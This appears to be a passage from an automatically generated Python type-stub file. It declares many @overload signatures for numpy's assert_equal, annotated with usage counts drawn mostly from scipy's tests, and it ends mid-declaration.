@overload
def assert_equal(actual: Literal["rand2bin"], desired: Literal["rand2bin"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["randtobest1bin"], desired: Literal["randtobest1bin"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["_randtobest1"], desired: Literal["_randtobest1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["randtobest1exp"], desired: Literal["randtobest1exp"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Literal["currenttobest1bin"], desired: Literal["currenttobest1bin"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Literal["_currenttobest1"], desired: Literal["_currenttobest1"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Literal["currenttobest1exp"], desired: Literal["currenttobest1exp"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Union[int, float]], desired: List[Union[int, float]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: float, desired: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: bool):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[int, float]]):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[int, int]]):
"""
usage.scipy: 6
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[float, int]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Tuple[float, float]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: int, desired: numpy.int64):
"""
usage.scipy: 6
"""
...
@overload
def assert_equal(actual: bool, desired: int):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.float64):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Union[float, int]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[Union[list, int]], desired: List[Union[list, int]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Union[int, list]], desired: List[Union[int, list]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[list, list]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[list, List[int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, float], desired: Tuple[int, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[int, float]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, int]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["direct"], desired: Literal["direct"]):
"""
usage.scipy: 6
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[decimal.Decimal]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int8]):
"""
usage.scipy: 16
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.uint16]):
"""
usage.scipy: 10
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int16]):
"""
usage.scipy: 11
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.uint64]):
"""
usage.scipy: 10
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[int]):
"""
usage.scipy: 11
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.ulonglong]):
"""
usage.scipy: 10
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[decimal.Decimal]):
"""
usage.scipy: 8
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[complex]):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.complex128):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: complex):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: List[int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: int):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["boxcar, 10, 0"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["boxcar, 10, 9"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: bool, desired: numpy.bool_, err_msg: Literal["bartlett, 51, 26"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 128"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 192"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: bool, desired: numpy.bool_, err_msg: Literal["blackman, 300, 200"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: str):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 255"]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["boxcar, 10, 7"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: bool, desired: numpy.bool_, err_msg: Literal["bartlett, 51, 10"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 37"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: bool, desired: numpy.bool_, err_msg: Literal["blackman, 300, 123"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 256, 39"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: bool, desired: numpy.bool_, err_msg: Literal["hann, 64, 0"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.float64, err_msg: str):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: int, err_msg: Literal["[1.]"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: int, err_msg: str):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.matrix, desired: List[List[int]]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(actual: Callable, desired: Callable):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.matrix, desired: numpy.ndarray):
"""
usage.scipy: 20
"""
...
@overload
def assert_equal(actual: Literal["csr"], desired: Literal["csr"]):
"""
usage.scipy: 14
"""
...
@overload
def assert_equal(
actual: Literal["matrix on the left"], desired: Literal["matrix on the left"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_equal(
actual: Literal["matrix on the right"], desired: Literal["matrix on the right"]
):
"""
usage.scipy: 8
"""
...
@overload
def assert_equal(actual: Literal["bsr"], desired: Literal["bsr"]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(actual: Literal["coo"], desired: Literal["coo"]):
"""
usage.scipy: 13
"""
...
@overload
def assert_equal(actual: Literal["csc"], desired: Literal["csc"]):
"""
usage.scipy: 14
"""
...
@overload
def assert_equal(actual: Literal["dia"], desired: Literal["dia"]):
"""
usage.scipy: 14
"""
...
@overload
def assert_equal(actual: Literal["dok"], desired: Literal["dok"]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(actual: Literal["lil"], desired: Literal["lil"]):
"""
usage.scipy: 13
"""
...
@overload
def assert_equal(actual: numpy.bool_, desired: numpy.bool_):
"""
usage.dask: 1
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Type[numpy.bool_], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int8, desired: numpy.int8):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Type[numpy.int8], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.uint8], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.int16], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.uint16], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.int32], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.uint32], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.int64], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.uint64], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.longlong):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.ulonglong):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Type[numpy.float32], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.float64], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.float128, desired: numpy.float128):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: Type[numpy.float128], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.complex64], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.complex128], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.complex256, desired: numpy.complex256):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: Type[numpy.complex256], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.bool_, desired: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.complex128, desired: int):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int32]):
"""
usage.scipy: 22
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(0, -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, 0)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, 1)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(1, -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-1, -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-2, -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-5, -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(array(-1), -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -2)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -5)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, array(-1))"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.int64, desired: numpy.int64, err_msg: Literal["(-3, -3)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.sparse.csr.csr_matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.int64):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.float64):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: numpy.float64):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.complex64, desired: numpy.complex128):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.int64]):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: scipy.sparse.csc.csc_matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.longlong, desired: numpy.longlong):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.longlong], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ulonglong, desired: numpy.ulonglong):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.ulonglong], desired: numpy.dtype):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.sparse.dok.dok_matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.sparse.lil.lil_matrix, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.matrix, desired: List[List[int]], err_msg: str):
"""
usage.scipy: 16
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: float, verbose: bool):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[Literal["MT19937"], numpy.ndarray, int, int, float],
desired: Tuple[Literal["MT19937"], numpy.ndarray, int, int, float],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: Tuple[float, int], desired: Tuple[numpy.float64, numpy.int64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: list, desired: list):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: dict, desired: dict):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Tuple[int, int]], desired: List[Tuple[int, int]]):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(
actual: List[Tuple[Union[None, int], ...]],
desired: List[Tuple[Union[None, int], ...]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: int, err_msg: Literal["(0.25, 0.25, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: int, err_msg: Literal["(0.75, 0.75, 0)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: int, err_msg: Literal["(0.3, 0.2, 1)"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[set], desired: List[set], err_msg: str):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: List[Tuple[int, int, int]], desired: List[Tuple[int, int, int]]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: List[Tuple[int, int, int, int]], desired: List[Tuple[int, int, int, int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[int, int, int, int, int]],
desired: List[Tuple[int, int, int, int, int]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Tuple[int, ...]], desired: List[Tuple[int, ...]]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(
actual: List[Tuple[Tuple[int, int], Tuple[int, int]]],
desired: List[Tuple[Tuple[int, int], Tuple[int, int]]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[List[numpy.int64]], desired: List[List[numpy.int64]]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[List[int]], desired: List[List[int]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.complex128, desired: complex):
"""
usage.scipy: 26
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, float]
):
"""
usage.scipy: 20
"""
...
@overload
def assert_equal(actual: scipy.special.orthogonal.orthopoly1d, desired: numpy.poly1d):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Dict[str, Literal["ignore"]], desired: Dict[str, Literal["ignore"]]
):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.complex128, desired: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[numpy.ndarray], desired: List[numpy.ndarray]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[float, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[numpy.float64, numpy.float64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[int, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[float, int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int], desired: List[int], err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[numpy.int64, numpy.int64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: List[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[float, float]
):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[float, float, float, float],
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: List[numpy.ndarray], desired: List[float]):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[Union[float, int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float], desired: Tuple[numpy.ndarray, numpy.ndarray]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["a"], desired: Literal["a"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["a, b"], desired: Literal["a, b"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float], desired: scipy.stats.morestats.BartlettResult
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float], desired: scipy.stats.morestats.FlignerResult
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[Tuple[numpy.ndarray, numpy.ndarray], Tuple[float, float, float]],
desired: Tuple[Tuple[numpy.ndarray, numpy.ndarray], Tuple[float, float, float]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
Tuple[numpy.ndarray, numpy.ndarray], Tuple[numpy.float64, numpy.float64, float]
],
desired: Tuple[Tuple[numpy.ndarray, numpy.ndarray], Tuple[float, float, float]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.morestats.WilcoxonResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.int64):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.morestats.WilcoxonResult,
desired: scipy.stats.morestats.WilcoxonResult,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: scipy.stats.morestats.WilcoxonResult,
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[float, float, float, None], desired: Tuple[float, float, float, None]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Literal["Dimension mismatch"], desired: Literal["Dimension mismatch"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.SpearmanrResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.mstats_basic.SpearmanrResult,
desired: scipy.stats.stats.SpearmanrResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.KendalltauResult, desired: Tuple[float, float]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[Union[float, int]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: Tuple[numpy.int32, numpy.int32]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.str_, desired: Literal["showers"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.stats.stats.ModeResult, desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: scipy.stats.mstats_basic.ModeResult, desired: Tuple[int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[Union[int, float]]):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.ma.core.MaskedArray, desired: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[float], desired: Type[float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, int]
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_relResult, desired: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_relResult,
desired: Tuple[List[Union[float, int]], List[Union[float, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_indResult, desired: Tuple[float, float]
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_indResult,
desired: Tuple[List[Union[float, int]], List[Union[float, int]]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_1sampResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.Ttest_1sampResult,
desired: Tuple[List[Union[float, int]], List[Union[float, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[List[float], List[float]],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ma.core.MaskedArray, numpy.ma.core.MaskedArray],
desired: Tuple[float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.int64, numpy.int64], desired: Tuple[numpy.int64, numpy.int64]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: None):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[float], desired: numpy.ndarray):
"""
usage.matplotlib: 1
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_equal(
actual: scipy.stats.stats.F_onewayResult, desired: Tuple[float, float]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: scipy.stats.stats.KruskalResult, desired: Tuple[float, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[numpy.ndarray], desired: numpy.ndarray):
